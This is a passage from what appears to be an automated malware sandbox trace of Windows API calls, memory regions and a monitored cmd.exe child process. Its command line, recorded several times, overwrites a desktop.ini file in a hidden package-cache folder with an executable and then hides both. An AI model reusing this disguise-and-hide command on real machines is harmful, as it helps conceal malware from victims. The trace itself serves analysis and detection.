(_FileHandle=1) returned 0x4c [0202.682] WriteFile (in: hFile=0x4c, lpBuffer=0x30f150*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e244, lpOverlapped=0x0 | out: lpBuffer=0x30f150*, lpNumberOfBytesWritten=0x30e244*=0x50, lpOverlapped=0x0) returned 1 [0202.682] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.682] GetFileType (hFile=0x4c) returned 0x1 [0202.682] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.682] WriteFile (in: hFile=0x4c, lpBuffer=0x30f1a0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e244, lpOverlapped=0x0 | out: lpBuffer=0x30f1a0*, lpNumberOfBytesWritten=0x30e244*=0x50, lpOverlapped=0x0) returned 1 [0202.682] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.682] GetFileType (hFile=0x4c) returned 0x1 [0202.682] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.682] WriteFile (in: hFile=0x4c, lpBuffer=0x30f1f0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e244, lpOverlapped=0x0 | out: lpBuffer=0x30f1f0*, lpNumberOfBytesWritten=0x30e244*=0x50, lpOverlapped=0x0) returned 1 [0202.682] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.682] GetFileType (hFile=0x4c) returned 0x1 [0202.683] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.683] WriteFile (in: hFile=0x4c, lpBuffer=0x30f240*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x30e244, lpOverlapped=0x0 | out: lpBuffer=0x30f240*, lpNumberOfBytesWritten=0x30e244*=0x20, lpOverlapped=0x0) returned 1 [0202.683] _get_osfhandle (_FileHandle=4) returned 0x54 [0202.683] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30e230 | out: lpNewFilePointer=0x0) returned 1 [0202.683] _get_osfhandle (_FileHandle=4) returned 0x54 [0202.683] ReadFile (in: hFile=0x54, lpBuffer=0x30f060, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e250, lpOverlapped=0x0 | out: lpBuffer=0x30f060*, lpNumberOfBytesRead=0x30e250*=0x200, lpOverlapped=0x0) returned 1 [0202.683] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.683] 
GetFileType (hFile=0x4c) returned 0x1 [0202.683] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.683] GetFileType (hFile=0x4c) returned 0x1 [0202.683] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.683] WriteFile (in: hFile=0x4c, lpBuffer=0x30f060*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e244, lpOverlapped=0x0 | out: lpBuffer=0x30f060*, lpNumberOfBytesWritten=0x30e244*=0x50, lpOverlapped=0x0) returned 1 [0202.683] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.683] GetFileType (hFile=0x4c) returned 0x1 [0202.683] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.683] WriteFile (in: hFile=0x4c, lpBuffer=0x30f0b0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e244, lpOverlapped=0x0 | out: lpBuffer=0x30f0b0*, lpNumberOfBytesWritten=0x30e244*=0x50, lpOverlapped=0x0) returned 1 [0202.683] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.683] GetFileType (hFile=0x4c) returned 0x1 [0202.683] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.683] WriteFile (in: hFile=0x4c, lpBuffer=0x30f100*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e244, lpOverlapped=0x0 | out: lpBuffer=0x30f100*, lpNumberOfBytesWritten=0x30e244*=0x50, lpOverlapped=0x0) returned 1 [0202.683] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.683] GetFileType (hFile=0x4c) returned 0x1 [0202.683] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.683] WriteFile (in: hFile=0x4c, lpBuffer=0x30f150*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e244, lpOverlapped=0x0 | out: lpBuffer=0x30f150*, lpNumberOfBytesWritten=0x30e244*=0x50, lpOverlapped=0x0) returned 1 [0202.683] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.683] GetFileType (hFile=0x4c) returned 0x1 [0202.683] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.683] WriteFile (in: hFile=0x4c, lpBuffer=0x30f1a0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e244, lpOverlapped=0x0 | out: lpBuffer=0x30f1a0*, lpNumberOfBytesWritten=0x30e244*=0x50, lpOverlapped=0x0) returned 1 
[0202.683] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.683] GetFileType (hFile=0x4c) returned 0x1 [0202.683] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.683] WriteFile (in: hFile=0x4c, lpBuffer=0x30f1f0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e244, lpOverlapped=0x0 | out: lpBuffer=0x30f1f0*, lpNumberOfBytesWritten=0x30e244*=0x50, lpOverlapped=0x0) returned 1 [0202.683] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.683] GetFileType (hFile=0x4c) returned 0x1 [0202.684] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.684] WriteFile (in: hFile=0x4c, lpBuffer=0x30f240*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x30e244, lpOverlapped=0x0 | out: lpBuffer=0x30f240*, lpNumberOfBytesWritten=0x30e244*=0x20, lpOverlapped=0x0) returned 1 [0202.684] _get_osfhandle (_FileHandle=4) returned 0x54 [0202.684] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30e230 | out: lpNewFilePointer=0x0) returned 1 [0202.684] _get_osfhandle (_FileHandle=4) returned 0x54 [0202.684] ReadFile (in: hFile=0x54, lpBuffer=0x30f060, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e250, lpOverlapped=0x0 | out: lpBuffer=0x30f060*, lpNumberOfBytesRead=0x30e250*=0x32, lpOverlapped=0x0) returned 1 [0202.684] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.684] GetFileType (hFile=0x4c) returned 0x1 [0202.684] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.684] GetFileType (hFile=0x4c) returned 0x1 [0202.684] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.684] WriteFile (in: hFile=0x4c, lpBuffer=0x30f060*, nNumberOfBytesToWrite=0x32, lpNumberOfBytesWritten=0x30e244, lpOverlapped=0x0 | out: lpBuffer=0x30f060*, lpNumberOfBytesWritten=0x30e244*=0x32, lpOverlapped=0x0) returned 1 [0202.684] _get_osfhandle (_FileHandle=4) returned 0x54 [0202.684] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30e230 | out: lpNewFilePointer=0x0) returned 1 [0202.684] _close 
(_FileHandle=4) returned 0 [0202.684] FindNextFileW (in: hFindFile=0x4a0e80, lpFindFileData=0x30f2c4 | out: lpFindFileData=0x30f2c4) returned 0 [0202.685] GetLastError () returned 0x12 [0202.685] FindClose (in: hFindFile=0x4a0e80 | out: hFindFile=0x4a0e80) returned 1 [0202.685] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0202.685] _close (_FileHandle=3) returned 0 [0202.686] _get_osfhandle (_FileHandle=1) returned 0x7 [0202.686] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0202.686] _get_osfhandle (_FileHandle=1) returned 0x7 [0202.686] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0202.686] _get_osfhandle (_FileHandle=0) returned 0x3 [0202.686] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0202.686] SetConsoleInputExeNameW () returned 0x1 [0202.686] GetConsoleOutputCP () returned 0x1b5 [0202.686] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0202.686] SetThreadUILanguage (LangId=0x0) returned 0x409 [0202.686] exit (_Code=0) Process: id = "489" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea169e0" os_pid = "0x8a4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{33D1F~1\\desktop.ini\" & del /f /q \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{33D1F~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{33D1F~1\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{33D1F~1\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{33D1F~1\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], 
"BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 29501 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 29502 start_va = 0x30000 end_va = 0x12ffff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 29503 start_va = 0x130000 end_va = 0x133fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000130000" filename = "" Region: id = 29504 start_va = 0x140000 end_va = 0x140fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000140000" filename = "" Region: id = 29505 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 29506 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 29507 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 29508 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 29509 start_va = 0x7ffd6000 end_va = 0x7ffd6fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd6000" filename = "" Region: id = 29510 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = 
"private_0x000000007ffdf000" filename = "" Region: id = 29950 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 29951 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 29952 start_va = 0x150000 end_va = 0x1b6fff entry_point = 0x150000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 29953 start_va = 0x2a0000 end_va = 0x39ffff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 29954 start_va = 0x550000 end_va = 0x55ffff entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 29955 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 29956 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 29957 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 29958 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 29959 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: 
"c:\\windows\\system32\\msvcrt.dll") Region: id = 29960 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 29961 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 29962 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 29963 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 29964 start_va = 0x1c0000 end_va = 0x287fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 29965 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 29966 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 29967 start_va = 0x290000 end_va = 0x296fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000290000" filename = "" Region: id = 29968 start_va = 0x3a0000 end_va = 0x4a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 29969 start_va = 0x4b0000 end_va = 0x4b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004b0000" filename = "" Region: id = 29970 start_va = 0x4c0000 end_va = 
0x4c0fff entry_point = 0x0 region_type = private name = "private_0x00000000004c0000" filename = "" Region: id = 29971 start_va = 0x4d0000 end_va = 0x4d0fff entry_point = 0x0 region_type = private name = "private_0x00000000004d0000" filename = "" Region: id = 29972 start_va = 0x560000 end_va = 0x115ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000560000" filename = "" Region: id = 29973 start_va = 0x1160000 end_va = 0x12c2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001160000" filename = "" Region: id = 29974 start_va = 0x12d0000 end_va = 0x159efff entry_point = 0x12d0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 686 os_tid = 0xff8 [0202.526] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x12fcd4 | out: lpSystemTimeAsFileTime=0x12fcd4*(dwLowDateTime=0xad859ae0, dwHighDateTime=0x1d440a9)) [0202.526] GetCurrentProcessId () returned 0x8a4 [0202.527] GetCurrentThreadId () returned 0xff8 [0202.527] GetTickCount () returned 0x3926f [0202.527] QueryPerformanceCounter (in: lpPerformanceCount=0x12fccc | out: lpPerformanceCount=0x12fccc*=25931576643) returned 1 [0202.527] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0202.527] __set_app_type (_Type=0x1) [0202.527] __p__fmode () returned 0x76b331f4 [0202.527] __p__commode () returned 0x76b331fc [0202.527] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0202.527] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0202.527] GetCurrentThreadId () returned 0xff8 [0202.527] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xff8) returned 0x38 [0202.528] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 
[0202.528] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0202.528] SetThreadUILanguage (LangId=0x0) returned 0x409 [0202.528] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0202.528] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x12fc64 | out: phkResult=0x12fc64*=0x0) returned 0x2 [0202.528] VirtualQuery (in: lpAddress=0x12fc9b, lpBuffer=0x12fc34, dwLength=0x1c | out: lpBuffer=0x12fc34*(BaseAddress=0x12f000, AllocationBase=0x30000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0202.528] VirtualQuery (in: lpAddress=0x30000, lpBuffer=0x12fc34, dwLength=0x1c | out: lpBuffer=0x12fc34*(BaseAddress=0x30000, AllocationBase=0x30000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0202.528] VirtualQuery (in: lpAddress=0x31000, lpBuffer=0x12fc34, dwLength=0x1c | out: lpBuffer=0x12fc34*(BaseAddress=0x31000, AllocationBase=0x30000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0202.528] VirtualQuery (in: lpAddress=0x33000, lpBuffer=0x12fc34, dwLength=0x1c | out: lpBuffer=0x12fc34*(BaseAddress=0x33000, AllocationBase=0x30000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0202.528] VirtualQuery (in: lpAddress=0x130000, lpBuffer=0x12fc34, dwLength=0x1c | out: lpBuffer=0x12fc34*(BaseAddress=0x130000, AllocationBase=0x130000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0202.528] GetConsoleOutputCP () returned 0x1b5 [0202.528] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0202.528] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0202.528] 
_get_osfhandle (_FileHandle=1) returned 0x7 [0202.528] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0202.528] _get_osfhandle (_FileHandle=1) returned 0x7 [0202.528] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0202.529] _get_osfhandle (_FileHandle=1) returned 0x7 [0202.529] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0202.529] _get_osfhandle (_FileHandle=0) returned 0x3 [0202.529] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0202.529] _get_osfhandle (_FileHandle=0) returned 0x3 [0202.529] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0202.529] GetEnvironmentStringsW () returned 0x2b04b0* [0202.529] FreeEnvironmentStringsW (penv=0x2b04b0) returned 1 [0202.529] GetEnvironmentStringsW () returned 0x2b04b0* [0202.529] FreeEnvironmentStringsW (penv=0x2b04b0) returned 1 [0202.529] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x12ebd4 | out: phkResult=0x12ebd4*=0x40) returned 0x0 [0202.529] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x12ebdc, lpData=0x12ebe0, lpcbData=0x12ebd8*=0x1000 | out: lpType=0x12ebdc*=0x0, lpData=0x12ebe0*=0x60, lpcbData=0x12ebd8*=0x1000) returned 0x2 [0202.530] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x12ebdc, lpData=0x12ebe0, lpcbData=0x12ebd8*=0x1000 | out: lpType=0x12ebdc*=0x4, lpData=0x12ebe0*=0x1, lpcbData=0x12ebd8*=0x4) returned 0x0 [0202.530] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x12ebdc, lpData=0x12ebe0, lpcbData=0x12ebd8*=0x1000 | out: lpType=0x12ebdc*=0x0, lpData=0x12ebe0*=0x1, lpcbData=0x12ebd8*=0x1000) returned 0x2 [0202.530] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x12ebdc, lpData=0x12ebe0, lpcbData=0x12ebd8*=0x1000 | 
out: lpType=0x12ebdc*=0x4, lpData=0x12ebe0*=0x0, lpcbData=0x12ebd8*=0x4) returned 0x0 [0202.530] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x12ebdc, lpData=0x12ebe0, lpcbData=0x12ebd8*=0x1000 | out: lpType=0x12ebdc*=0x4, lpData=0x12ebe0*=0x40, lpcbData=0x12ebd8*=0x4) returned 0x0 [0202.530] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x12ebdc, lpData=0x12ebe0, lpcbData=0x12ebd8*=0x1000 | out: lpType=0x12ebdc*=0x4, lpData=0x12ebe0*=0x40, lpcbData=0x12ebd8*=0x4) returned 0x0 [0202.530] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x12ebdc, lpData=0x12ebe0, lpcbData=0x12ebd8*=0x1000 | out: lpType=0x12ebdc*=0x0, lpData=0x12ebe0*=0x40, lpcbData=0x12ebd8*=0x1000) returned 0x2 [0202.530] RegCloseKey (hKey=0x40) returned 0x0 [0202.530] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x12ebd4 | out: phkResult=0x12ebd4*=0x40) returned 0x0 [0202.530] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x12ebdc, lpData=0x12ebe0, lpcbData=0x12ebd8*=0x1000 | out: lpType=0x12ebdc*=0x0, lpData=0x12ebe0*=0x40, lpcbData=0x12ebd8*=0x1000) returned 0x2 [0202.530] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x12ebdc, lpData=0x12ebe0, lpcbData=0x12ebd8*=0x1000 | out: lpType=0x12ebdc*=0x4, lpData=0x12ebe0*=0x1, lpcbData=0x12ebd8*=0x4) returned 0x0 [0202.530] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x12ebdc, lpData=0x12ebe0, lpcbData=0x12ebd8*=0x1000 | out: lpType=0x12ebdc*=0x0, lpData=0x12ebe0*=0x1, lpcbData=0x12ebd8*=0x1000) returned 0x2 [0202.530] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x12ebdc, lpData=0x12ebe0, lpcbData=0x12ebd8*=0x1000 | out: lpType=0x12ebdc*=0x4, lpData=0x12ebe0*=0x0, lpcbData=0x12ebd8*=0x4) 
returned 0x0 [0202.530] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x12ebdc, lpData=0x12ebe0, lpcbData=0x12ebd8*=0x1000 | out: lpType=0x12ebdc*=0x4, lpData=0x12ebe0*=0x9, lpcbData=0x12ebd8*=0x4) returned 0x0 [0202.530] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x12ebdc, lpData=0x12ebe0, lpcbData=0x12ebd8*=0x1000 | out: lpType=0x12ebdc*=0x4, lpData=0x12ebe0*=0x9, lpcbData=0x12ebd8*=0x4) returned 0x0 [0202.530] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x12ebdc, lpData=0x12ebe0, lpcbData=0x12ebd8*=0x1000 | out: lpType=0x12ebdc*=0x0, lpData=0x12ebe0*=0x9, lpcbData=0x12ebd8*=0x1000) returned 0x2 [0202.530] RegCloseKey (hKey=0x40) returned 0x0 [0202.530] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863a4 [0202.530] srand (_Seed=0x5b8863a4) [0202.530] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{33D1F~1\\desktop.ini\" & del /f /q \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{33D1F~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{33D1F~1\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{33D1F~1\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{33D1F~1\"" [0202.530] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{33D1F~1\\desktop.ini\" & del /f /q \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{33D1F~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{33D1F~1\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{33D1F~1\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{33D1F~1\"" [0202.530] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0202.531] 
GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2b1c10, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0202.531] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0202.531] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0202.531] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0202.531] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0202.531] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0202.531] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0202.531] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0202.531] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0202.531] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0202.531] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0202.531] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0202.531] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0202.531] GetEnvironmentStringsW () returned 0x2b2600* [0202.531] FreeEnvironmentStringsW (penv=0x2b2600) returned 1 [0202.531] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0202.531] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0202.531] _wcsicmp 